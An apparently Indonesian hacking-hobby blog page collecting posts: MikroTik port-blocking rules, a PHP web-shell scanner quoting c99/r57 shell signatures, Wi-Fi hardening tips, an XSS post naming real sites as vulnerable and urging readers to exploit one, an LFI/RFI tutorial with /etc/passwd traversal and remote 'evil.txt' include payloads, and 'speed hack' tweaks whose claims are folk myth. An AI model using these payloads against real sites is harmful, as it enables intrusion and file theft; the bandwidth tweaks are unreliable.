Setelah Googling ada juga yang melalui dumping file, tapi saya kurang paham system ini,
dan bagusnya setau saya semua port diatas tidak digunakan oleh game - game online Indonesia manapun. Karena kebanyakan warnet gabung dengan game online :D

dibawah ini ada script mikrotik yang bisa langsung di paste di terminal mikrotik anda, nanti src address nya sesuaikan dengan IP Network LAN warnet tujuan.

Code:



1 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=21 comment="BLOCK FTP"

2 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=995 comment="BLOCK MAIL"

3 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=25 comment="BLOCK PORT"

4 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=465 comment="BLOCK PORT"

5 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=587 comment="BLOCK PORT"

6 ip firewall filter add chain=forward protocol=tcp src-address=110.110.1.0/24 action=drop port=110 comment="BLOCK PORT"



ane contohkan disini pake 110.110.1.0/24 karena jaringan network dimarkas ane pake 110.110.1.0/24 , bisa disesuaikan dengan ip lan warnet nya
nah dengan begitu kita bisa agak merasa aman karena si empunya keylogge
Read More »
20.10 Under From 0x13
[0 Comment]


nih SC buat scan backdoor atau shell lewat php

#!/usr/bin/php
array("c999shexit();", "setcookie(\"c999sh_surl\");", "c999_buff_prepare();"),
"c100" => array("\$back_connect_c=\"f0VMRgEBAQA", "function myshellexec(\$command) {", "tEY87ExcilDfgAMhwqM74s6o"),
"r57" => array("if(strpos(ex(\"echo abcr57\"),\"r57\")!=3)", "function ex(\$cfe)", "\$port_bind_bd_c=\"I2luY2x1ZGUg"),
"erne"=> array("function unix2DosTime(\$unixtime = 0)", "eh(\$errno, \$er", "\$mtime=@date(\"Y-m-d H:i:s\",@filemti"),
"Safe_Over" => array("function walkArray(\$array){", "function printpagelink(\$a, \$b, \$link = \"\")", "if (\$cmd != \"downl\")"),
"cmd_asp" => array(" ' -- Read th", "ll oFileSys.D", "Author: Maceo")
);
//the script work
$euristic_active = true;
$euristic_sens = 40;
for ($i = 1; $i < $argc; $i++) { if ($argv[$i] == "-h") help($argv[0]); elseif($argv[$i] == "-e") { if ($argv[$i+1] == "Y") $euristic_active = true; if ($argv[$i+1] == "N") $euristic_active = false; } elseif($argv[$i] == "-p") $euristic_sens = $argv[$i+1]; elseif($argv[$i] == "-d") { dir_scan($argv[$i+1]); exit; } elseif($argv[$i] == "-f") { a($argv[$i+1]); exit; } } dir_scan("."); function dir_scan($name) { if (!is_dir($name)) echo "$name is not a dir\n"; if ($o = @opendir($name)) { while(false !== ($file = readdir($o))) { if ($file == '.' or $file == '..' or $file == basename(__file__)){ continue;} else if (is_dir($name."/".$file)){dir_scan($name."/".$file);} else a($name."/".$file); } closedir($o); } else echo "i can't open $name dir\n"; } function a($file) { global $euristic_active; global $euristic_sens; if ($l = file_get_contents($file)) { if ( $shell = check($l)) { echo "[DANGER] word_list > ".$file."\tprobably ".$shell." shell\n";
}
else if ($euristic_active)
if ($t = check_euristic($l) and $t > $euristic_sens)
{
echo "[_ALERT] euristic $t%> ".$file."\tprobably is a shell\n";
}
}
else
{
echo "i can't open $file file\n";
}
}
function check($string)
{
$check = 0;
global $word__;
foreach($word__ as $shell => $code)
foreach($code as $microcode)
if (stripos($string, $microcode) !== false)
{
$check ++;
if ($check == 3) return $shell;
}
return false;
}
function check_euristic($string)
{
global $euristic__;
$check = 0;
foreach($euristic__ as $code)
if (stripos($string, $code) !== false)
$check++;
return intval(($check * 100) / count($euristic__));
}
function help($me)
{
echo "indonesianhacker shell scanner\n".
"$me {-e [euristic method default = Y] Y/N -p [[0-100] euristic sensibility fewer == most feeble ] [-d [directory] / -f [file] ]}\n".
"exemple: $me -e N -d /tmp\n"
;
exit;
}
?>

save dengan ext nya scanshell.php

moga membntu
Read More »

0 proteksi Wi-Fi

20.08 Under From 0x13
[0 Comment]
1. Menggunakan Enkripsi.

Enkripsi yaitu security yang pertama, namun masih banyak wireless access points (AP) tidak menggunakan enkripsi sebagai default-nya. Meskipun banyak AP telah memiliki Wired Equivalent Privacy (WEP) protocol, tetapi secara default tidak diaktifkan. WEP memang mempunyai beberapa lubang di security-nya, dan seorang peretas yang berpengalaman pasti dapat membukanya, tetapi itu masih tetap lebih baik dari pada tidak ada enkripsi sama sekali. Pastikan untuk mengaktifkan metode WEP authentication dengan “shared key” daripada “open system”. Untuk “open system”, AP tidak melakukan enkripsi data, tetapi hanya melakukan otentifikasi client. Ubah WEP key sesering mungkin, dan pakai 128-bit WEP hindari menggunakan 40-bit.

2. Gunakan Enkripsi Kuat.

Karena kelemahan-kelemahan yang ada di WEP, maka dianjurkan untuk menggunakan Wi-Fi Protected Access (WPA) juga. Untuk memakai WPA, AP harus men-support-nya. Sisi client juga harus dapat support WPA tersebut. Namun, saat ini hampir semua Access Point maupun user/client sudah mendukung WPA.

3. Ganti Password Administrator standar.

Kebanyakan pabrik menggunakan password administrasi yang sama untuk semua AP produk mereka. Default password tersebut umumnya sudah diketahui oleh peretas, yang nantinya dapat digunakan untuk merubah setting di AP Anda. Hal pertama yang harus dilakukan dalam konfigurasi AP adalah mengganti password default. Gunakan minimal 8 karakter, kombinasi antara huruf, function dan angka, dan tidak menggunakan kata-kata yang ada dalam kamus.

4. Matikan SSID Broadcasting.

Service Set Identifier (SSID) adalah nama dari wireless network kita. Secara default, SSID dari AP akan di-broadcast atau disiarkan. Hal ini akan membuat user mudah untuk menemukan network Anda, karena SSID akan muncul dalam daftar available networks yang ada pada wireless client. Jika SSID dimatikan, user harus mengetahui lebih dahulu SSID-nya agar dapat terkoneksi dengan network.

5. Matikan AP Saat Tidak Dipakai.

Cara yang satu ini kelihatannya sangat mudah dan remeh, tetapi beberapa perusahaan atau individual tidak melakukannya. Jika kita mempunyai user yang hanya terkoneksi pada saat saat tertentu saja, tidak ada alasan untuk menjalankan wireless network setiap saat dan menyediakan kesempatan bagi penyusup untuk melaksanakan niat jahatnya. Kita dapat mematikan access point pada saat tidak digunakan.

6. Ubah default SSID.

Pabrik menyediakan default SSID. Kegunaan dari mematikan broadcast SSID adalah untuk mencegah orang lain tahu nama dari network kita, tetapi jika masih memakai default SSID, tidak akan sulit untuk menerka SSID dari network kita.

7. Memakai MAC Filtering.

Kebanyakan AP akan memperbolehkan kita memakai filter Media Access Control (MAC). Ini artinya kita dapat membuat “white list” dari komputer-komputer yang boleh mengakses wireless network kita, berdasarkan dari MAC atau alamat fisik yang ada di network card masing-masing PC atau laptop. Koneksi dari MAC yang tidak ada dalam list akan ditolak. Metode ini tidak selamanya aman, karena masih mungkin bagi seorang hacker melakukan sniffing paket yang kita transmit via wireless network dan mendapatkan MAC address yang valid dari salah satu user, dan kemudian menggunakannya untuk melakukan spoof. Tetapi MAC filtering akan membuat kesulitan yang lumayan bagi seorang penyusup yang masih belum jago banget.

8. Mengisolasi Wireless Network dari LAN.

Untuk memproteksi internal network kabel dari ancaman yang datang dari wireless network, perlu kiranya dibuat wireless DMZ (Demiliterize Zone) atau perimeter network yang mengisolasi dari LAN. Artinya, memasang firewall antara wireless network dan LAN. Dan untuk wireless client yang membutuhkan akses ke internal network, dia haruslah melakukan otentifikasi dahulu dengan RAS server atau menggunakan VPN. Hal ini menyediakan extra layer untuk proteksi.

9. Mengontrol Signal Wireless.

02.11b WAP memancarkan gelombang sampai dengan kira kira 300 feet. Tetapi jarak ini dapat ditambahkan dengan cara mengganti antenna dengan yang lebih bagus. Dengan memakai high gain antena, kita bisa mendapatkan jarak yang lebih jauh. Directional antenna akan memancarkan sinyal ke arah tertentu, dan pancarannya tidak melingkar seperti yang terjadi di antena omnidirectional yang biasanya terdapat pada paket AP standard. Selain itu, dengan memilih antena yang sesuai, kita dapat mengontrol jarak sinyal dan arahnya untuk melindungi diri dari penyusup. Sebagai tambahan, ada beberapa AP yang bisa di setting kekuatan sinyal dan arahnya melalui config WAP tersebut.

10. Memancarkan Gelombang pada Frekuensi yang Berbeda.

Salah satu cara untuk bersembunyi dari peretas yang biasanya memakai teknologi 802.11b/g yang lebih populer adalah dengan memakai 802.11a. Karena 802.11a bekerja pada frekuensi yang berbeda (yaitu di frekuensi 5 GHz), NIC yang didesain untuk bekerja pada teknologi yang populer tidak akan dapat menangkap sinyal tersebut. Namun, tentu saja Anda akan mengalami penurunan kualitas kecepatan transmisi data pada jaringan wireless Anda 
Read More »

0 keamanan sistem wireless

20.07 Under From 0x13
[0 Comment]
Sistem wireless mulai populer. Hal ini dimulai dengan maraknya cellular phone (handphone) di dunia yang pada mulanya hanya memberikan akses voice. Kemudian handphone dapat pula digunakan untuk mengirimkan data. Sebagai catatan, jumlah pengguna handphone di dunia (selain di Amerika Utara) sudah mengalahkan jumlah pengguna Internet. Di Indonesia sendiri, saat ini terdapat lebih dari 4 juta pelanggan handphone sementara hanya ada 1,5 juta pengguna Internet. Dengan kata lain, handphone lebih merasuk daripada Internet yang menggunakan jaringan yang fixed (wired).
SMS merupakan salah satu aplikasi penting di dunia wireless, khususnya di Asia. Anda dapat lihat di jalanan, di kantor, dan dimana saja orang menekan tombol handphonenya untuk mengirim SMS. Jutaan SMS dikirimkan setiap harinya. Hal ini tidak terduga oleh operator wireless. Bahkan ada yang mengatakan bahwa SMS merupakan killer application di dunia wireless.

Di sisi lain perangkat komputer mulai muncul dalam ukuran yang kecil dan portable. Personal Digital Assistant (PDA) seperti Palm, Handspring, Symbian, Windows CE mulai banyak digunakan orang. Perangkat ini tadinya bersifat standalone atau hanya memiliki fasilitas transfer data dengan menggunakan kabel serial (ke komputer) dan IrDa (infra red antar perangkat). Kemudian muncul perangkat yang memungkinkan komputer berkomunikasi dengan menggunakan wireless LAN (seri IEEE 802.11) dan Bluetooth. Semakin marak dan laju perkembangan komunikasi data secara wireless.
Secara umum, tekonologi wireless dapat dibagi menjadi dua:
1. Cellular-based technology: yaitu solusi yang menggunakan saluran komunikasi cellular atau pager yang sudah ada untuk mengirimkan data. Jangkauan dari cellullar-based biasanya cukup jauh.
2. Wireless LAN (WLAN): yaitu komunikasi wireless dalam lingkup area yang terbatas, biasanya antara 10 s/d 100 meter dari base station ke Access Point (AP).
Kedua jenis teknologi di atas tidak berdiri sendiri, melainkan memiliki banyak teknologi dan standar yang berbeda (dan bahkan terdapat konflik). Contohnya:


    Cellullar: GSM, CDMA, TDMA, CDPD, GPRS/EDGE, 2G, 2.5G, 3G, UMTS
    LAN: keluarga IEEE 802.11 (seperti 802.11b, 802.11a, 802.11g), HomeRF, 802.15 (Personal Area Network) yang berbasis Bluetooth, 802.16 (Wireless Metropolitan Area Network)

Kelihatannya akan ada konvergensi dari teknologi wireless dan juga dari perangkat pengakses informasi ini. Siapa pemenangnya? masih terlalu dini untuk diputuskan. Komunikasi wireless banyak disukai dikarenakan banyak keuntungan atau kemudahan, yaitu antara lain:


    Kenyamanan dengan adanya fasilitas roaming sehingga dapat dihubungi dan dapat mengakses informasi dimana saja.
    Komunikasi wireless memungkinkan pengguna bergerak dan tidak terikat pada satu tempat saja. Seorang eksekutif yang disopiri dapat mengakses emailnya di mobilnya ketika jalan sedang macet. Seorang pekerja dapat membawa notebooknya ke luar dan bekerja dari halaman yang rindang.
    Kecepatan dari komunikasi wireless sudah memasuki batas kenyamanan pengguna. Kecepatan ini masih akan terus meningkat.
    Mulai muncul aplikasi yang menggunakan fasilitas wireless, seperti misalnya location-specific applications.


Masalah Keamanan Sistem Wireless


Sistem wireless memiliki permasalahan keamanan tersendiri (khusus). Beberapa hal yang mempengaruhi aspek keamanan dari sistem wireless antara lain:


    Perangkat pengakses informasi yang menggunakan sistem wireless biasanya berukuran kecil sehingga mudah dicuri. Laptop, notebook, handphone, palm, dan sejenisnya sangat mudah dicuri. Jika dia dicuri, maka informasi yang ada di dalamnya (atau kunci pengakses informasi) bisa jatuh ke tangan orang yang tidak berhak.
    Penyadapan (man-in-the-middle attack) dapat dilakukan lebih mudah karena tidak perlu mencari jalur kabel untuk di-‘tap’. Sistem yang tidak menggunakan pengamanan enkripsi, atau menggunakan enkripsi yang mudah dipecah, akan mudah ditangkap.
    Perangkat wireless yang kecil membatasi kemampuan perangkat dari sisi CPU, RAM, kecepatan komunikasi, catu daya. Akibatnya sistem pengamanan (misalnya enkripsi) yang digunakan harus memperhatikan batasan ini. Saat ini tidak memungkinkan untuk menggunakan sistem enkripsi yang canggih yang membutuhkan CPU cycle yang cukup tinggi sehingga memperlambat transfer data.
    Pengguna tidak dapat membuat sistem pengaman sendiri (membuat enkripsi sendiri) dan hanya bergantung kepada vendor (pembuat perangkat) tersebut. Namun mulai muncul perangkat handphone yang dapat diprogram oleh pengguna.
    Adanya batasan jangkauan radio dan interferensi menyebabkan ketersediaan servis menjadi terbatas. DoS attack dapat dilakukan dengan menginjeksikan traffic palsu.
    Saat ini fokus dari sistem wireless adalah untuk mengirimkan data secepat mungkin. Adanya enkripsi akan memperlambat proses pengiriman data sehingga penggunaan enkripsi masih belum mendapat prioritas. Setelah kecepatan pengiriman data sudah memadai dan harganya menjadi murah, barulah kita akan melihat perkembangan di sisi pengamanan dengan menggunakan enkripsi.


Contoh Kasus Celah Keamanan Sistem Wireless


Beberapa contoh kasus lubang keamanan sistem wireless antara lain:


    Cloning sistem cellular berbasis AMPS sehingga “pulsa” pelanggan dapat dicuri oleh orang lain yang tidak berhak.
    Enkripsi A5 dari sistem seluler GSM yang dibatasi kemampuan dan dirahasiakan algoritmanya. Algoritma yang dirahasiakan dianggap tidak aman karena tidak melalui proses review yang terbuka.
    Peneliti di Amerika sudah membuktikan bocornya LAN perusahaan yang menggunakan wireless LAN IEEE 802.11b. Dengan menggunakan sebuah notebook yang dilengkapi dengan perangkat IEEE 802.11b seorang peneliti sambil berjalan menunjukkan LAN dan data-data dari beberapa perusahaan yang bocor ke jalan di depan kantor. Penggunaan firewall untuk membatasi akses ke kantor dari Internet akan sia-sia jika pintu belakang (backdoor) wireless LAN bisa digunakan oleh cracker untuk masuk ke sistem. Program untuk memecahkan wireless LAN ini mulai banyak tersedia di Internet, seperti misalnya Airsnort, Netstumbler, WEPcrack, dan lain-lain.
    NIST (lembaga standar di Amerika) melarang penggunaan wireless LAN untuk institusi pemerintah yang memiliki data-data rahasia.


Pengamanan Sistem Wireless


Untuk sistem wireless LAN yang menggunakan IEEE 802.11b, disarankan untuk mensegmentasi jaringan dimana wireless LAN ini berada dan menganggap segmen ini sebagai extranet. Jika diperlukan, firewall digunakan untuk membatasi jaringan ini dengan jaringan internal yang membutuhkan keamanan lebih tinggi.

Untuk meningkatkan keamanan, gunakan MAC address sebagai mekanisme untuk memperbolehkan connection (access control). Kerugian dari mekanisme ini adalah kecepatan maksimum yang dapat diperoleh adalah sekitar 11 Mbps. (Secara teori MAC address masih dapat diserang dengan menggunakan proxy arp.) Akses dengan menggunakan MAC ini masih belum membatasi penyadapan.

Enkripsi seperti WEP digunakan untuk menghindari dan mempersulit akses. WEP sendiri masih memiliki banyak masalah teknis, dimana crack (pemecahan) enkripsi WEP membutuhkan computing resources yang dimiliki oleh orang-orang tertentu. Di masa yang akan datang akan ada pengamanan yang lebih baik.

Aplikasi yang menggunakan perangkat wireless sebaiknya menggunakan mekanisme enkripsi end-to-end, dengan menganggap jaringan sebagai sistem yang tidak aman.
Read More »

Jumat, 09 September 2011

0 XSS for newbie

21.34 Under From 0x13
[0 Comment]
XSS for dummies
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client . XSS merupakan pilihan yang menarik bagi para newbie yang tidak mempunyai shell dan sploit ,karena untuk melakukan xss hanya di butuhkan sebuah browser. Ingat XSS adalah hanya memasukan script kedalam url site target . Ada perbedaan antara XSS dengan Script injetion . Xss hasilnya hanya bisa diliat secara temporary beda dengan script injection yang full merubahnya sama seperti kita mendapatkan root dan merubah halaman index-nya.

Berikut POC dari serangan XSS:

Ufoakses.net

Ambarrukmo.com


  HNC menemukan 1 website lg yg memiliki celah xss. Ini alamat-nya, http://www.multigames88.com . Silahkan temen2 coba exploitasi. 
 
HNC

Read More »

0 Tutor singkat RFI & LFI

21.32 Under From 0x13
[0 Comment]
Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue:

Sebelumnya apa sih LFI dan RFI itu??

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.


Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:


Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,


Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini

Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.
*Referensi:
- Crawler
- http://en.wikipedia.org/local_file_incusion
- http://en.wikipedia.org/remote_file_inclusion


HNC
Read More »

0 ISTILAH-ISTILAH HACKING

21.22 Under From 0x13
[0 Comment]
SQL Injection : memasukkan (injeksi) command2 sql ke dalm query sql dlm prgram, memanipulasi query sql dlm program.

DDoS : Distributed Denial of Service. DoS sndiri adalah serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim,spt bandwith,memory,dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar,biasanya menggunakan bot pd irc.

Shell: inti dari sistem operasi.Shell mengendalikan krj sistem operasi nya.

Shell intepreter: bentuk antarmuka yg merupakan penghubung antara shell dgn brainware. Bentuk umumnya berupa console,cmd,webshell,dll.

Deface: merubah tampilan hlman suatu website secara illegal

Debug: kegiatan mencari bug pada aplikasi dan memperbaiki bug yg d temukan.

Bug
-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

Patch
-> Perbaikan terhadap bug dengan mengupdate sistem yg vurnerable.

Vurnerable
-> Sistem yang memiliki bug sehingga rentan terhadap serangan.

XSS
-> adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Phising
-> adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

Keylogger
-> adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)


Fake Login
-> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

Fake Process
-> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".
Malicious Code/Script
-> Kode yg dibuat untuk tujuan jahat atau biasa disebut kode jahat.

Virus
-> Kode jahat yg sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yg diinfeksinya. File yg terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yg memeriksa crc32 dari dirinya.

Worm (Cacing)
-> Kode jahat yg sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

Trojan (Horse)
-> Kode jahat yg sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

Backdoor: pintu belakang untuk masuk ke sistem yg telah brhasil d exploitasi oleh attacker. Brtujuan untuk jalan masuk lg k sistem korban sewaktu2.

Bind: membuka port pada kompi korban.Biasanya untuk tujuan backdooring. Bind umumnya disertai service2 yg lgsg mengakses shell.

Back connect : mendapatkan koneksi balik or mengkonek-kan kompi korban ke kompi kita.


Flood : membanjiri target untuk tujuan target down. Flood = DoS. Ada bnyk mcm flood :
tsunami flood : membanjiri user dgn karakter2 berat dgn jumlah banyak,berbentuk spt gelombang tsunami.Tujuanya hanya membuat user disconnected. Tsunami flood hny trjd d irc.
TCP Flood : membanjiri jalur tcp target sehingga target kehabisan bandwith pada port yg sedang d flood. Pd ddos web server, tcp flood d serangkan ke port 80 (http), sehingga menyebabkan jalur http penuh.
Dll.

Port
-> Sederhananya adalah sebuah colokan, dimana colokan tersebut menyediakan layanan (service) tertentu.
Pada hardware komputer terdapat USB Port, Serial Port, Printer Port, dll.
Pada sistem operasi, port ini abstrak, tidak kelihatan seperti port2 pada hardware. Contoh: FTP Port (21), SSH Port (22), Telnet Port (23), HTTP Port (80), dll.
Ibaratnya jika kita mencolokkan kabel ke Port 80, maka kita akan mendapatkan layanan HTTP untuk dapat Browsing situs, download, dll.




HNC
Read More »

Senin, 05 September 2011

0 hack bandwith di idm (internet download manager)

17.52 Under From 0x13
[0 Comment]
Setting maksimal IDM

option > tab connection > pilih LAN 10MBs > default
max conn number ganti ke 16 buat yang koneksi kencang minimal 3G /384kbps pilihan 16 akan benar-benar memanfaatkan bandwidth koneksi yang kita punya.
Untuk yang memakai koneksi gprs/64kbps pilihan terbaik adalah set ke 1.agar koneksi kita tidak RTO alias Putus2
tab general >automatically start download of URL di centang tab download >centang start immediately while displaying (ni IDM akan auto start unduh begitu ada link yang kita masukan di IDM.


Memasukkan Proxy ke IDM
Klik menu Download >> Options >> Tab Proxy.
Centang Use HTTP Proxy.
Pada kolom Proxy isikan ini : Proxies.telkom.net.id lalu pada kolom Port isikan : 8080 untuk kolom User Name dan Password biarkan kosong saja.
anda bebas mau menggunakan proxy yang aku kasih atau tidak, jika anda mempunyai alamat pengaturan proxy yang lain pake aja milik anda.
cara ini akan membuat kecepatan download anda menjadi stabil.
NB : Cara di atas terkadang membuat  download anda menjadi gagal, jika terjadi hal demikian jangan gunakan proxynya dengan cara menghilangkan tanda centang di Use HTTP Proxy.

Cara menggunakannya :

klik tulisan scheduler di IDM pada tulisan main download queue (kiri atas) di tab schedule centang semua option di bagian bawah
hang up modem when done
exit IDM when done
turn off computer when done
force process to terminate
pada tab kiri bawah..klik new queue.. Beri nama bebas, kembali ke tab main download >>files in queue >>drag n drop file ke new queue yang baru kita buat tadi (jav) pada tulisan jav tadi lakukan hal yang sama di bagian schedule
hang up modem when done
exit IDM when done
turn off computer when done
force process to terminate di bawah tulisan file in queue ..download … at the same time pilih 1 atau 2 saja biar speed download maksimal
klik start now… pc akan mati sendiri ketikan download kita sudah rampun
Read More »

0 hack koneksi (mudah-mudahan membantu) :)

17.44 Under From 0x13
[0 Comment]
nih saya share tentang sedikit cara mempercepat koneksi
 cekidot :------>



A. Menggubah setting bandwith Pada windows
Secara default OS windows membatasi bandwidth untuk koneksi internet sebanyak 20% dari total bandwidth, anda dapat memaksimalkan jatah bandwith untuk PC atau laptop yang anda gunakan agar akses internet anda dapat maksimal dengan tips sederhana ini :

1. Klik Tombol Start pada windows
2. Klik Run dan Ketik gpedit.msc dan klik OK
3. Pilih Administrative Templates dan Klik Network
4. Setelah terbuka klik QoS Packet scheduler
5. Pilih Limit Reservable Bandwidth dan ubah setting menjadi Enable
6. Ubah Bandwidth Limitnya menjadi 0 Klik Apply > OK
7. keluar dan Restart komputer


B. Setting DNS menggunakan OpenDNS.

1. Buka Control Panel
2. Pilih icon Network Connection
3. Klik Kanan Local Area Connection pilih Properties atau Wireless Network Connection jika anda menggunakan wireless untuk koneksi
4. Pilih Internet Protocol (TCP/IP) kemudian Klik Properties
5. Klik Use Following DNS Server
6. Isi Preferred DNS Server dengan angka : 208.67.222.222
7. Isi Alternate DNS Server dengan angka : 208.67.220.220
8. Kemudian Klik OK

C. Mengatur Buffer pada windows :

1. Klik tombol Start dan pilih Menu “Run”

2. Ketik “system.ini”

3. Setelah Terbuka tambahkan dibawah baris terakhir
page buffer=100000kbps load=100000kbps download=100000kbps save=100000kbps back=100000kbps

5. Hasilnya akan tampak seperti berikut ini.

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
page buffer=100000kbps load=100000kbps download=100000kbps save=100000kbps back=100000kbps

6. Save dan exit lalu resstart komputer anda
Read More »

0 kumpulan decrypt md5 online

17.41 Under From 0x13
[0 Comment]
Read More »